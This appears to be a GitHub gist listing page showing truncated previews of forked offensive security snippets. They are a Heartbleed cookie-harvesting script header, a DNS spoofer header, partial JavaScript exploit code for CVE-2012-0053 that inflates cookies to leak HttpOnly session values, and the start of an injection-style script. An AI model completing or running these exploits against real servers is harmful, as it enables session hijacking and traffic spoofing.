Scott Behrens sbehrens
sbehrens
/ heartbleed-altered.py
Created
April 8, 2014 23:08
— forked from mpdavis/heartbleed-altered.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. | |
| # Michael Davis (mike.philip.davis@gmail.com) | |
| # Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
| # The author disclaims copyright to this source code. | |
| import select |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # File: fakedns.py | |
| # Name: Interactive CLI DNS Spoofer | |
| # by: @mastahyeti | |
| # | |
| # based off of http://code.activestate.com/recipes/491264/ | |
| from __future__ import print_function | |
| from gevent.event import Event | |
| from gevent.pool import Pool | |
| from gevent import socket |
sbehrens
/ CVE-2012-0053.js
Created
June 18, 2012 16:36
— forked from btoews/CVE-2012-0053.js
CVE-2012-0053 Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(d){ | |
| desired_length = 8192; | |
| for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){}; | |
| for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){}; | |
| for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){}; | |
| d.cookie = cookie_val; | |
| d.cookie = "888=8"; | |
| x = new XMLHttpRequest(); | |
| x.onreadystatechange = function(){ | |
| if (x.readyState == 4 && x.status == 400){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##NOT FINISHED## | |
| ## ©mastahyeti 2011## | |
| import urllib2 | |
| import urllib | |
| import time | |
| import math | |
| CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but ' | |
| CHARSET_LEN = len(CHARSET) |